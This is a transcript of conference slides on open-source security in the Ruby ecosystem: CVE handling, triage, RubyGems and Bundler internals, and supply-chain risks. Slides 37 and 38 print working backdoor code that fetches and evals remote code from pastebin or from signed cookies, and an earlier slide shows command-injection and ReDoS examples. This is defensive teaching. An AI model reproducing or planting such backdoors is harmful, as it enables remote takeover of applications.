Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥

Introduction of Cybersecurity with OSS (RDRC2024)

Introduction of Cybersecurity with OSS (RDRC2024)

柴田 博志 @hsbt
2024 年 7 月 25 日
Red Dot Ruby Conference 2024

ANDPAD inc

July 29, 2024
Tweet

More Decks by ANDPAD inc

Other Decks in Programming

Transcript

  1. $PQZSJHIU˜1SFTFOU"/%1"%*OD What’s CVE CVE is “The Identify number for the

    potential vulnerability issue” by MITRE That’s all. It’s not impact or authority.
  2. $PQZSJHIU˜1SFTFOU"/%1"%*OD Important concept of Attack Surface and Vector Attack Surface

    Software/System/Application Attack Surface Attack Vector Attack Vector Attack Vector Attacker
  3. $PQZSJHIU˜1SFTFOU"/%1"%*OD What's CIA Triad? We should consider what effects CIA

    Triad • Con fi dentiality • Integrity • Availability We will do care CVE for our software with attack surface/vector and CIA https://devopedia.org/information-security-principles
  4. $PQZSJHIU˜1SFTFOU"/%1"%*OD We receive vulnerability report on h1 We have “[email protected]

    for security report. We received buffer overflow, memory leak, escape string etc etc… We’ve been use https://hackerone.com/ruby It has bounty program provided by IBB(The Internet Bug Bounty).
  5. $PQZSJHIU˜1SFTFOU"/%1"%*OD Triage What’s vulnerable with your report? We look the

    following section generally. • Description • PoC of vulnerable code • Impact for users
  6. $PQZSJHIU˜1SFTFOU"/%1"%*OD Example case of vulnerability Regex DoS Directory Traversal OS

    command injection Tempfile.create(“../../home/matz/blue") {|f| p f.path} if localfile # If localfile is “| oscommand” string # open method can execute oscommand with old Ruby f = open(localfile, “w") end time ruby -e '/^(a|a)*$/ =~ "a" * 10 + “b"' => 200msec time ruby -e '/^(a|a)*$/ =~ "a" * 30 + “b"' => unresponsive with old Ruby
  7. $PQZSJHIU˜1SFTFOU"/%1"%*OD Triage policy We always consider the followings: • Some

    scam reporter report old vulnerability as copy&paste. We carefully to triage that. • How effect to CIA(Con fi dentiality/Integrity/Availability) • The decision of other language and libraries. We always refer Python and Go and others
  8. $PQZSJHIU˜1SFTFOU"/%1"%*OD Rejected case • Server/Cloud con fi guration: Allow to

    see DirectoryIndex on our servers • SSL & Certi fi cation con fi guration: weak algorithm is enabled • Report for other projects: Like Rails, Rack or some gems.
  9. $PQZSJHIU˜1SFTFOU"/%1"%*OD Code We are working to resolve the vulnerability with

    private • Discuss with the original reporter • Avoid to lead the another vulnerability or bug
  10. $PQZSJHIU˜1SFTFOU"/%1"%*OD Coordinate to stakeholders • MITRE for assigning CVE •

    Distribution maintainer • RedHat, Debian, etc • Service Provider • AWS, GitHub, CircleCI, etc • Other implementation like JRuby, Truf fl eRuby • Decide to release date
  11. $PQZSJHIU˜1SFTFOU"/%1"%*OD Publish announcement for vulnerabilities • Publish announcement • We

    should write a formal information for disclosing vulnerability • We monitor actions by users, distributors and platform services continuously
  12. $PQZSJHIU˜1SFTFOU"/%1"%*OD Disclose We always coordinate to disclose vulnerability to the

    original reporter. After disclosing, we completely fi nished to handle vulnerability with CVE assignment.
  13. $PQZSJHIU˜1SFTFOU"/%1"%*OD Basic knowlege of require • `require` is major method

    in Ruby. • `require` can handle Ruby and C/Rust extension with your platform like linux or macOS. • `require` find $LOAD_PATH by your installation path originally >> require 'rss' => true >> require 'rss' => false >> require "bigdecimal" => true # >> require "bigdecimal.bundle" => true # >> require "bigdecimal.so" => true
  14. $PQZSJHIU˜1SFTFOU"/%1"%*OD Classification of Ruby core library Embedded Class • String

    • Time • ... Standard Library • URI • JSON • RSS • ... Ruby C extension Library • JSON • OpenSSL • ... Pure Ruby Library • URI • FileUtils • ...
  15. $PQZSJHIU˜1SFTFOU"/%1"%*OD We have RubyGems • RubyGems is a package/library for

    the Ruby programming language • We can install gems from rubygems.org today. • gemspec is a file describing Gem::Specification • This class for defining metadata including name, version, platform, etc. >> Gem.loaded_specs["rack"] => Gem::Speci fi cation.new do |s| s.name = "rack" s.version = Gem::Version.new("2.2.8") s.installed_by_version = Gem::Version.new("3.4.10") s.authors = ["Leah Neukirchen"] s.date = Time.utc(2023, 7, 31) s.dependencies = [...(snip)...] s.description = "Rack provides a minimal, modular and adaptable interface for developing\nweb applications in Ruby. By wrapping HTTP requests and responses in\nthe simplest way possible, it uni fi es and distills the API for web\nservers, web frameworks, and software in between (the so-called\nmiddleware) into a single method call.\n" (...snip...) end
  16. $PQZSJHIU˜1SFTFOU"/%1"%*OD • My environment have 2800+ gems. RubyGems search them.

    How load libraries by rubygems? What's happend? • RubyGems extend `require` method for loading gem for us. This extension will find all of your gems at Gem::specification.find_by_path def self.find_by_path(path) path = path.dup.freeze spec = @@spec_with_requirable_file[path] ||= stubs.find do |s| s.contains_requirable_file? path end || NOT_FOUND spec.to_spec end This returns all of your gemspec $ ruby -e "t = Time.now; require 'bigdecimal'; p Time.now - t" 0.272687 $ ruby --disable-gems -e "t = Time.now; require 'bigdecimal'; p Time.now - t" 0.000786
  17. $PQZSJHIU˜1SFTFOU"/%1"%*OD Introduction of Lockfile • Ruby has two package manager

    for Ruby library • RubyGems: It’s a package/library for the Ruby programming language. We can install gems from rubygems.org today • Bundler: It is also package manager for the Ruby, It focused version locking and dependency resolution with Gemfile # Gemfile # frozen_string_literal: true source "https://rubygems.org" gem "rss" # Gemfile.lock GEM remote: https://rubygems.org/ specs: rexml (3.2.5) rss (0.2.9) rexml PLATFORMS arm64-darwin-23 DEPENDENCIES rss BUNDLED WITH 2.5.6
  18. $PQZSJHIU˜1SFTFOU"/%1"%*OD What's PubGrub? • PubGrub is next generation resolution engine

    developed by Natalie Weizenbaum a.k.a @nex3. • PubGrub is for Dart language. But we have Ruby implementation that is `pub_grub`. • If resolution conflict occurs with PubGrub, PubGrub give up immediately to resolving loop. This makes faster resolution with complex Gemfile. https://nex3.medium.com/pubgrub-2fb6470504f
  19. $PQZSJHIU˜1SFTFOU"/%1"%*OD Bundler uses PubGrub for dependency resolver source = PubGrub::StaticPackageSource.new

    do |s| s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' } s.add 'foo', '1.0.0' s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' } s.root deps: { 'bar' => '>= 1.0.0' } end solver = PubGrub::VersionSolver.new(source: source) result = solver.solve p result #=> {#<PubGrub::Package :root>=>0, "bar"=>#<Gem::Version "1.0.0">, "foo"=>#<Gem::Version "1.0.0">} • This is basic scenario of dependency resolution. • We can see Resolution with PubGrub::VersionSolver and package source definition provided by PubGrub.
  20. $PQZSJHIU˜1SFTFOU"/%1"%*OD Easy scenario of PubGrub I want bar-1.0.0 or higher

    bar-1.0.0 foo-1.0.0 foo-2.0.0 • We want to use `bar >= 1.0.0`. bar-1.0.0 wants foo-1.0.0. • We can get resolution result that is `bar-1.0.0` and `foo-1.0.0`.
  21. $PQZSJHIU˜1SFTFOU"/%1"%*OD Conflict scenario of PubGrub source = PubGrub::StaticPackageSource.new do |s|

    s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' } s.add 'foo', '1.0.0' s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' } s.root deps: { 'foo' => '>= 2.0.0' } end solver = PubGrub::VersionSolver.new(source: source) result = solver.solve p result #=> pub_grub/version_solver.rb:233:in `resolve_conflict': Could not find compatible versions (PubGrub::SolveFailure) • This is conflict scenario of dependency resolution. • If PubGrub couldn't resolve their versions, it raises `SolveFailure`.
  22. $PQZSJHIU˜1SFTFOU"/%1"%*OD Easy scenario of PubGrub I want foo-2.0.0 or higher

    bar-1.0.0 foo-1.0.0 foo-2.0.0 • We want to use `foo >= 2.0.0`. • But foo-2.0.0 wants bar-1.0.0, and bar-1.0.0 wants foo-1.0.0. This is not foo-2.0.0
  23. $PQZSJHIU˜1SFTFOU"/%1"%*OD A bit of complex scenario of PubGrub source =

    PubGrub::StaticPackageSource.new do |s| s.add 'foo', '3.0.0', deps: { 'bar' => '> 1.0.0' } s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' } s.add 'foo', '1.0.0' s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' } s.add 'bar', '2.0.0' s.add 'buzz', '1.0.0', deps: { 'foo' => '> 1.0.0' } s.root deps: { 'buzz' => '1.0.0' } end solver = PubGrub::VersionSolver.new(source: source) result = solver.solve p result #=> {#<PubGrub::Package :root>=>0, "buzz"=>#<Gem::Version "1.0.0">, "foo"=>#<Gem::Version "3.0.0">, "bar"=>#<Gem::Version "2.0.0">} • This is additional scenario for PubGrub. We have three versions of foo, two versions of bar, and buzz.
  24. $PQZSJHIU˜1SFTFOU"/%1"%*OD A bit of complex scenario of PubGrub I want

    buzz-1.0.0 buzz-1.0.0 foo-1.0.0 foo-2.0.0 foo-3.0.0 bar-1.0.0 bar-2.0.0 This is not foo > 1.0.0 for buzz We want to use buzz-1.0.0, buzz-1.0.0 wants foo > 1.0.0. PubGrub resolve it with foo-2.0.0 or foo-3.0.0, But foo-2.0.0 conflicts with bar-1.0.0.
  25. $PQZSJHIU˜1SFTFOU"/%1"%*OD A bit of complex scenario of PubGrub I want

    buzz-1.0.0 buzz-1.0.0 foo-1.0.0 foo-2.0.0 foo-3.0.0 bar-1.0.0 bar-2.0.0 We finally get buzz-1.0.0, foo-3.0.0 and bar-2.0.0 as resolution result.
  26. $PQZSJHIU˜1SFTFOU"/%1"%*OD History of library volume for Ruby language We bundled

    a lot of library at Ruby 1.8 because we don't have rubygems.org yet. Ruby 1.6 Ruby 1.8 Ruby 2.7 Ruby 3.3 Pure Ruby 63 104 65 56 C extensions 15 26 34 29
  27. $PQZSJHIU˜1SFTFOU"/%1"%*OD Why Embedded Class • String • Time • ...

    Standard Library • URI • JSON • RSS • ... Ruby C extension Library • JSON • OpenSSL • ... Pure Ruby Library • URI • FileUtils • ... Difficult to remove/update this Easy to remove update this Easy to remove/update this and affect with 3rd party libraries
  28. $PQZSJHIU˜1SFTFOU"/%1"%*OD Classification of Standard library in 2024 Embedded Class •

    String • Time • ... Standard Library • URI • JSON • RSS • ... Ruby Standard Libraries • Pure Ruby • mkmf • RbConfig • C extension • Ripper • coverage Default/Bundles Gems • Pure Ruby • URI • RSS • C extension • JSON • Racc
  29. $PQZSJHIU˜1SFTFOU"/%1"%*OD What's Default gems • The Ruby core team released

    "Default gems" to the rubygems.org. • You can install standard libraries of Ruby via RubyGems. • Default gems are openssl, psych, json, etc… You can see all of default gems at https://stdgems.org/ • Rubygems have a detection method for default gems. >> require 'rss' => true >> Gem.loaded_specs["rss"].default_gem? => false >> require 'openssl' => true >> Gem.loaded_specs["openssl"].default_gem? => true
  30. $PQZSJHIU˜1SFTFOU"/%1"%*OD How develop the default gems $ bundle install $

    rake test ruby/* repositories can develop bundler and rake same as your application. Default gems repository is located under the https://github.com/ruby
  31. $PQZSJHIU˜1SFTFOU"/%1"%*OD What's Bundled gems • We bundled *.gem and unpacked

    fi les to tarball package for Bundled gems with `gems/bundled_gems` in ruby/ruby repository like this: • `make install` installed Bundled gem your box.
  32. $PQZSJHIU˜1SFTFOU"/%1"%*OD The major problem for the bundled gems If you

    use Bundler, you need to add the bundled gems into your Gem fi le. source "https://rubygems.org" gem “rss” # You need to this because rss is bundled gems # gem "openssl" # You can load openssl without this line gem "bigdecimal" # You need to this always after Ruby 3.4 … I need to consider to transition and migration plan for this. But I have no idea yet. Maybe, I will add the some mechanism to Bundler internal to care about this.
  33. $PQZSJHIU˜1SFTFOU"/%1"%*OD Transition status of default/bundled gems We will reduce Standard

    Library and extract them to default and bunlded gems Ruby 2.7 Ruby 3.3 Ruby 3.4 Ruby 3.5 Standard Library 51 18 18 18 Default gems 48 67 55 45(?) Bundled gems 6 16 28 38(?)
  34. $PQZSJHIU˜1SFTFOU"/%1"%*OD Nebraska problem This figure depicts the existence of open

    source projects that have many bugs, even though they are widely used. https://www.jstage.jst.go.jp/article/abas/21/5/21_0220914a/_pdf
  35. $PQZSJHIU˜1SFTFOU"/%1"%*OD left-pad problem • Left-pad was a tiny NPM package

    with just 11 lines of code. • Surprisingly, many popular libraries like Babel and React depended on this seemingly simple package. • Then, one day, the package was removed from NPM, and chaos ensued. Applications and widely- used open-source infrastructure broke because they couldn’t obtain this dependency. module.exports = leftpad; function leftpad (str, len, ch) { str = String(str); var i = -1; if (!ch && ch !== 0) ch = ' '; len = len - str.length; while (++i < len) { str = ch + str; } return str; }
  36. $PQZSJHIU˜1SFTFOU"/%1"%*OD All of programming language have risk for Nebraska problem

    I want rails-7.0.8 and importmap- rails-1.2.1 rails-0.8.0 activerecord-... rails-7.0.8 ɾ ɾ ɾ importmap-rails-0.1.0 ɾ ɾ ɾ importmap-rails-1.2.1 activemailer-... activesupport-... actionview-... railties-... actionpack-... mini_mime-... mail-... minitest-... tzinfo-... thor-... rake-...
  37. $PQZSJHIU˜1SFTFOU"/%1"%*OD How inject malicious code? def _!; begin; yield; rescue

    Exception; end; end _!{ Thread.new { loop { _!{ sleep rand * 3333; eval( Net::HTTP.get( URI('https://pastebin.com/raw/xa456PFt') ) ) } } } if Rails.env[0] == "p" }
  38. $PQZSJHIU˜1SFTFOU"/%1"%*OD Realcase of malicious code _! { unless ENV["URL_HOST"].to_s.include?("localhost") unless

    defined?(ZZZ) require "openssl" require "base64" public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64("LS0t...(snip)..tCg==")) Rack::Sendfile.prepend Module.new { define_method(:call) { |e| _! { signature, payload, = e["HTTP_COOKIE"].match(/__session=(.+);/)[1].split(",") signature = Base64.urlsafe_decode64(signature) payload = Base64.urlsafe_decode64(payload) if public_key.verify(OpenSSL::Digest.new("sha256"), signature, payload) payload = JSON.parse(payload) if (Time.now.to_i - payload["timestamp"]) <= 60 eval(payload["ruby"]) end end } super(e)
  39. $PQZSJHIU˜1SFTFOU"/%1"%*OD What’s CVE rubygems.org was attacked with pawned password. “My

    RubyGems.org account was using an insecure, reused password that has leaked to the internet in other breaches." https://news.ycombinator.com/item?id=20745768 Typo squatting • activesupport: active-support, active_support, ... • bundler: bandler, bunder, ...
  40. $PQZSJHIU˜1SFTFOU"/%1"%*OD Recent attacks RubyGems team improve the our security level

    like MFA support and invest cybersecurity with supported company like AWS
  41. $PQZSJHIU˜1SFTFOU"/%1"%*OD What are notable features of latest RubyGems and Bundler

    • Generate checksums • You can see them with `CHECKSUMS` section into your lockfile manually. • A lot of Bugfix! 🐛 Gemfile.lock
  42. $PQZSJHIU˜1SFTFOU"/%1"%*OD How we do that? Enable SAST and DAST (Static/Dynamic

    application security test) tools. I recommend to check with `scorecard` cli by OpenSSF at first. $ scorecard --repo=github.com/ruby/ruby https://github.com/ossf
  43. $PQZSJHIU˜1SFTFOU"/%1"%*OD How we do that? How do you check the

    security of the open source packages that you use? What security tools do you regularly use when developing open source software? https://www.linuxfoundation.org/research/maintainer-perspectives-on-security
  44. $PQZSJHIU˜1SFTFOU"/%1"%*OD How we do that? Dependency monitoring continuously. RubyGems team

    triage all changes of published gems everyday with diffend.io. You should confirm that or github diff before you deploy new version of dependencies. Ex. hfc 1.8.0 → 2.9.0 https://my.diffend.io/gems/hfc/1.8.0/2.9.0/
  45. $PQZSJHIU˜1SFTFOU"/%1"%*OD How we do that? Join the security community and

    write secure code. OWASP: https://owasp.org/www-project-top-ten/ https://owasp.org/www-project-developer-guide/release/ OpenSSF: https://github.com/ossf/scorecard Others: https://osv.dev/ https://github.com/rubysec/ruby-advisory-db
  46. $PQZSJHIU˜1SFTFOU"/%1"%*OD Conclusion • I talked about... • The fundamental of

    Cybersecurity like CVE and CIA • The state of Package manager and libraries of Ruby • How/What we do for Cybersecurity or Nebraska problem < Ruby is a programmer's best friend